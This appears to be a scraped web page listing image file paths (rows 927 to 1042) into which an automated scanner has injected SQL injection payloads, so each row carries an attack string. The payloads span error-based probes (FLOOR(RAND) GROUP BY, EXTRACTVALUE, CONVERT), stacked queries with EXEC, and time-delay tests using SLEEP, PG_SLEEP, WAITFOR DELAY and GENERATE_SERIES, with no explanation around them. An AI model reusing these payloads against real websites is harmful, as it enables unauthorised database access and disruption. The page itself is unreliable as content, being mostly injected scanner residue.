927. | 1 | balance.gif //slike//stran_1%' OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND 'MxtQ%'='MxtQ/balance.gif |
928. | 1 | balance.gif //slike//stran_1' OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND 'LddF' LIKE 'LddF/balance.gif |
929. | 1 | (SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND ("XEhJ"="XEhJ&file=balance.gif','','scrollbars=1,resizable=1');">balance.gif //slike//stran_1") OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND ("XEhJ"="XEhJ/balance.gif |
930. | 1 | (SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND "QJCx"="QJCx&file=balance.gif','','scrollbars=1,resizable=1');">balance.gif //slike//stran_1" OR ROW(6373,1369)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(6373=6373,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 3993 UNION SELECT 6339 UNION SELECT 4813 UNION SELECT 5564)a GROUP BY x) AND "QJCx"="QJCx/balance.gif |
931. | 1 | balance.gif //slike//stran_1) AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND (9437=9437/balance.gif |
932. | 1 | balance.gif //slike//stran_1)) AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ((5099=5099/balance.gif |
933. | 1 | balance.gif //slike//stran_1 AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)))/balance.gif |
934. | 1 | balance.gif //slike//stran_1 AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)))-- Aoil/balance.gif |
935. | 1 | balance.gif //slike//stran_1') AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ('Mijt'='Mijt/balance.gif |
936. | 1 | balance.gif //slike//stran_1')) AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND (('WFbD'='WFbD/balance.gif |
937. | 1 | balance.gif //slike//stran_1' AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'StVe'='StVe/balance.gif |
938. | 1 | balance.gif //slike//stran_1') AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ('dgSg' LIKE 'dgSg/balance.gif |
939. | 1 | balance.gif //slike//stran_1%' AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'iCXJ%'='iCXJ/balance.gif |
940. | 1 | balance.gif //slike//stran_1' AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'sQCV' LIKE 'sQCV/balance.gif |
941. | 1 | balance.gif //slike//stran_1") AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ("dgam"="dgam/balance.gif |
942. | 1 | balance.gif //slike//stran_1" AND 3970 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3970=3970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND "lrII"="lrII/balance.gif |
943. | 1 | balance.gif //slike//stran_-6858) OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND (5633=5633/balance.gif |
944. | 1 | balance.gif //slike//stran_-2077)) OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ((4634=4634/balance.gif |
945. | 1 | balance.gif //slike//stran_-9432 OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)))/balance.gif |
946. | 1 | balance.gif //slike//stran_-7716 OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)))-- YKEa/balance.gif |
947. | 1 | balance.gif //slike//stran_-8249') OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ('FtcO'='FtcO/balance.gif |
948. | 1 | balance.gif //slike//stran_-8641')) OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND (('uKRd'='uKRd/balance.gif |
949. | 1 | balance.gif //slike//stran_-2588' OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'jsow'='jsow/balance.gif |
950. | 1 | balance.gif //slike//stran_-9317') OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ('hQoS' LIKE 'hQoS/balance.gif |
951. | 1 | balance.gif //slike//stran_-7709%' OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'AULI%'='AULI/balance.gif |
952. | 1 | balance.gif //slike//stran_-7531' OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'rvSq' LIKE 'rvSq/balance.gif |
953. | 1 | balance.gif //slike//stran_-4000") OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ("EMuA"="EMuA/balance.gif |
954. | 1 | balance.gif //slike//stran_-9808" OR 7026 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7026=7026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND "yIkD"="yIkD/balance.gif |
955. | 1 | balance.gif //slike//stran_1) AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND (4355=4355/balance.gif |
956. | 1 | balance.gif //slike//stran_1)) AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ((3570=3570/balance.gif |
957. | 1 | balance.gif //slike//stran_1 AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)))/balance.gif |
958. | 1 | balance.gif //slike//stran_1 AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)))-- jNfA/balance.gif |
959. | 1 | balance.gif //slike//stran_1') AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ('yBxO'='yBxO/balance.gif |
960. | 1 | balance.gif //slike//stran_1')) AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND (('oXgP'='oXgP/balance.gif |
961. | 1 | balance.gif //slike//stran_1' AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'DtwF'='DtwF/balance.gif |
962. | 1 | balance.gif //slike//stran_1') AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ('WabF' LIKE 'WabF/balance.gif |
963. | 1 | balance.gif //slike//stran_1%' AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'yhga%'='yhga/balance.gif |
964. | 1 | balance.gif //slike//stran_1' AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'Xkkc' LIKE 'Xkkc/balance.gif |
965. | 1 | balance.gif //slike//stran_1") AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND ("yzfR"="yzfR/balance.gif |
966. | 1 | balance.gif //slike//stran_1" AND 4364=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4364=4364) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))) AND "wXml"="wXml/balance.gif |
967. | 1 | balance.gif //slike//stran_1) AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND (5017=5017/balance.gif |
968. | 1 | balance.gif //slike//stran_1)) AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND ((2840=2840/balance.gif |
969. | 1 | balance.gif //slike//stran_1 AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))/balance.gif |
970. | 1 | balance.gif //slike//stran_1 AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))-- qmpt/balance.gif |
971. | 1 | balance.gif //slike//stran_1') AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND ('eODI'='eODI/balance.gif |
972. | 1 | balance.gif //slike//stran_1')) AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND (('sxXG'='sxXG/balance.gif |
973. | 1 | balance.gif //slike//stran_1' AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND 'LAuD'='LAuD/balance.gif |
974. | 1 | balance.gif //slike//stran_1') AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND ('qwdZ' LIKE 'qwdZ/balance.gif |
975. | 1 | balance.gif //slike//stran_1%' AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND 'dNco%'='dNco/balance.gif |
976. | 1 | balance.gif //slike//stran_1' AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND 'eXpD' LIKE 'eXpD/balance.gif |
977. | 1 | balance.gif //slike//stran_1") AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND ("sxqR"="sxqR/balance.gif |
978. | 1 | balance.gif //slike//stran_1" AND 3929=CONCAT(CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113),(SELECT (CASE WHEN (3929=3929) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113)) AND "VeAz"="VeAz/balance.gif |
979. | 1 | balance.gif //slike//stran_1) PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND (2420=2420/balance.gif |
980. | 1 | balance.gif //slike//stran_1)) PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND ((2736=2736/balance.gif |
981. | 1 | balance.gif //slike//stran_1 PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1)/balance.gif |
982. | 1 | balance.gif //slike//stran_1 PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1)-- ybgi/balance.gif |
983. | 1 | balance.gif //slike//stran_1') PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND ('Jldp'='Jldp/balance.gif |
984. | 1 | balance.gif //slike//stran_1')) PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND (('gPBU'='gPBU/balance.gif |
985. | 1 | balance.gif //slike//stran_1' PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND 'DplA'='DplA/balance.gif |
986. | 1 | balance.gif //slike//stran_1') PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND ('chah' LIKE 'chah/balance.gif |
987. | 1 | balance.gif //slike//stran_1%' PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND 'QwGv%'='QwGv/balance.gif |
988. | 1 | balance.gif //slike//stran_1' PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND 'iydr' LIKE 'iydr/balance.gif |
989. | 1 | balance.gif //slike//stran_1") PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND ("Ycst"="Ycst/balance.gif |
990. | 1 | balance.gif //slike//stran_1" PROCEDURE ANALYSE(EXTRACTVALUE(8825,CONCAT(0x5c,0x7171707671,(SELECT (CASE WHEN (8825=8825) THEN 1 ELSE 0 END)),0x7170767871)),1) AND "zYYj"="zYYj/balance.gif |
991. | 1 | balance.gif //slike//stran_(SELECT 5583 FROM(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(5583=5583,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)/balance.gif |
992. | 1 | balance.gif //slike//stran_1,(SELECT 8264 FROM (SELECT ROW(8264,4752)>(SELECT COUNT(*),CONCAT(0x7171707671,(SELECT (ELT(8264=8264,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM (SELECT 2171 UNION SELECT 6192 UNION SELECT 6814 UNION SELECT 3315)a GROUP BY x))s)/balance.gif |
993. | 1 | balance.gif //slike//stran_1);DECLARE @nVhu NVARCHAR(4000);SET @nVhu=(SELECT 'qqpvq'+(SELECT (CASE WHEN (3878=3878) THEN '1' ELSE '0' END))+'qpvxq');EXEC @nVhu--/balance.gif |
994. | 1 | balance.gif //slike//stran_1));DECLARE @nVhu NVARCHAR(4000);SET @nVhu=(SELECT 'qqpvq'+(SELECT (CASE WHEN (3878=3878) THEN '1' ELSE '0' END))+'qpvxq');EXEC @nVhu--/balance.gif |
995. | 1 | balance.gif //slike//stran_1;DECLARE @nVhu NVARCHAR(4000);SET @nVhu=(SELECT 'qqpvq'+(SELECT (CASE WHEN (3878=3878) THEN '1' ELSE '0' END))+'qpvxq');EXEC @nVhu--/balance.gif |
996. | 1 | balance.gif //slike//stran_1');DECLARE @nVhu NVARCHAR(4000);SET @nVhu=(SELECT 'qqpvq'+(SELECT (CASE WHEN (3878=3878) THEN '1' ELSE '0' END))+'qpvxq');EXEC @nVhu--/balance.gif |
997. | 1 | balance.gif //slike//stran_1'));DECLARE @nVhu NVARCHAR(4000);SET @nVhu=(SELECT 'qqpvq'+(SELECT (CASE WHEN (3878=3878) THEN '1' ELSE '0' END))+'qpvxq');EXEC @nVhu--/balance.gif |
998. | 1 | balance.gif //slike//stran_1';DECLARE @nVhu NVARCHAR(4000);SET @nVhu=(SELECT 'qqpvq'+(SELECT (CASE WHEN (3878=3878) THEN '1' ELSE '0' END))+'qpvxq');EXEC @nVhu--/balance.gif |
999. | 1 | balance.gif //slike//stran_1%';DECLARE @nVhu NVARCHAR(4000);SET @nVhu=(SELECT 'qqpvq'+(SELECT (CASE WHEN (3878=3878) THEN '1' ELSE '0' END))+'qpvxq');EXEC @nVhu--/balance.gif |
1000. | 1 | balance.gif //slike//stran_1");DECLARE @nVhu NVARCHAR(4000);SET @nVhu=(SELECT 'qqpvq'+(SELECT (CASE WHEN (3878=3878) THEN '1' ELSE '0' END))+'qpvxq');EXEC @nVhu--/balance.gif |
1001. | 1 | balance.gif //slike//stran_1";DECLARE @nVhu NVARCHAR(4000);SET @nVhu=(SELECT 'qqpvq'+(SELECT (CASE WHEN (3878=3878) THEN '1' ELSE '0' END))+'qpvxq');EXEC @nVhu--/balance.gif |
1002. | 1 | balance.gif //slike//stran_(SELECT CONCAT(CONCAT('qqpvq',(CASE WHEN (7665=7665) THEN '1' ELSE '0' END)),'qpvxq'))/balance.gif |
1003. | 1 | balance.gif //slike//stran_(SELECT CONCAT(0x7171707671,(ELT(1537=1537,1)),0x7170767871))/balance.gif |
1004. | 1 | balance.gif //slike//stran_(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(113)+(CASE WHEN (6083=6083) THEN CHAR(49) ELSE CHAR(48) END)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(120)+CHAR(113))/balance.gif |
1005. | 1 | balance.gif //slike//stran_1);SELECT SLEEP(32)#/balance.gif |
1006. | 1 | balance.gif //slike//stran_1));SELECT SLEEP(32)#/balance.gif |
1007. | 1 | balance.gif //slike//stran_1;SELECT SLEEP(32)#/balance.gif |
1008. | 1 | balance.gif //slike//stran_1');SELECT SLEEP(32)#/balance.gif |
1009. | 1 | balance.gif //slike//stran_1'));SELECT SLEEP(32)#/balance.gif |
1010. | 1 | balance.gif //slike//stran_1';SELECT SLEEP(32)#/balance.gif |
1011. | 1 | balance.gif //slike//stran_1%';SELECT SLEEP(32)#/balance.gif |
1012. | 1 | balance.gif //slike//stran_1");SELECT SLEEP(32)#/balance.gif |
1013. | 1 | balance.gif //slike//stran_1";SELECT SLEEP(32)#/balance.gif |
1014. | 1 | balance.gif //slike//stran_1);SELECT PG_SLEEP(32)--/balance.gif |
1015. | 1 | balance.gif //slike//stran_1));SELECT PG_SLEEP(32)--/balance.gif |
1016. | 1 | balance.gif //slike//stran_1;SELECT PG_SLEEP(32)--/balance.gif |
1017. | 1 | balance.gif //slike//stran_1');SELECT PG_SLEEP(32)--/balance.gif |
1018. | 1 | balance.gif //slike//stran_1'));SELECT PG_SLEEP(32)--/balance.gif |
1019. | 1 | balance.gif //slike//stran_1';SELECT PG_SLEEP(32)--/balance.gif |
1020. | 1 | balance.gif //slike//stran_1%';SELECT PG_SLEEP(32)--/balance.gif |
1021. | 1 | balance.gif //slike//stran_1");SELECT PG_SLEEP(32)--/balance.gif |
1022. | 1 | balance.gif //slike//stran_1";SELECT PG_SLEEP(32)--/balance.gif |
1023. | 1 | balance.gif //slike//stran_1);SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/balance.gif |
1024. | 1 | balance.gif //slike//stran_1));SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/balance.gif |
1025. | 1 | balance.gif //slike//stran_1;SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/balance.gif |
1026. | 1 | balance.gif //slike//stran_1');SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/balance.gif |
1027. | 1 | balance.gif //slike//stran_1'));SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/balance.gif |
1028. | 1 | balance.gif //slike//stran_1';SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/balance.gif |
1029. | 1 | balance.gif //slike//stran_1%';SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/balance.gif |
1030. | 1 | balance.gif //slike//stran_1");SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/balance.gif |
1031. | 1 | balance.gif //slike//stran_1";SELECT COUNT(*) FROM GENERATE_SERIES(1,32000000)--/balance.gif |
1032. | 1 | balance.gif //slike//stran_1);WAITFOR DELAY '0:0:32'--/balance.gif |
1033. | 1 | balance.gif //slike//stran_1));WAITFOR DELAY '0:0:32'--/balance.gif |
1034. | 1 | balance.gif //slike//stran_1;WAITFOR DELAY '0:0:32'--/balance.gif |
1035. | 1 | balance.gif //slike//stran_1');WAITFOR DELAY '0:0:32'--/balance.gif |
1036. | 1 | balance.gif //slike//stran_1'));WAITFOR DELAY '0:0:32'--/balance.gif |
1037. | 1 | balance.gif //slike//stran_1';WAITFOR DELAY '0:0:32'--/balance.gif |
1038. | 1 | balance.gif //slike//stran_1%';WAITFOR DELAY '0:0:32'--/balance.gif |
1039. | 1 | balance.gif //slike//stran_1");WAITFOR DELAY '0:0:32'--/balance.gif |
1040. | 1 | balance.gif //slike//stran_1";WAITFOR DELAY '0:0:32'--/balance.gif |
1041. | 1 | balance.gif //slike//stran_1);DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/balance.gif |
1042. | 1 | balance.gif //slike//stran_1));DECLARE @x CHAR(9);SET @x=0x303a303a332;WAITFOR DELAY @x--/balance.gif |
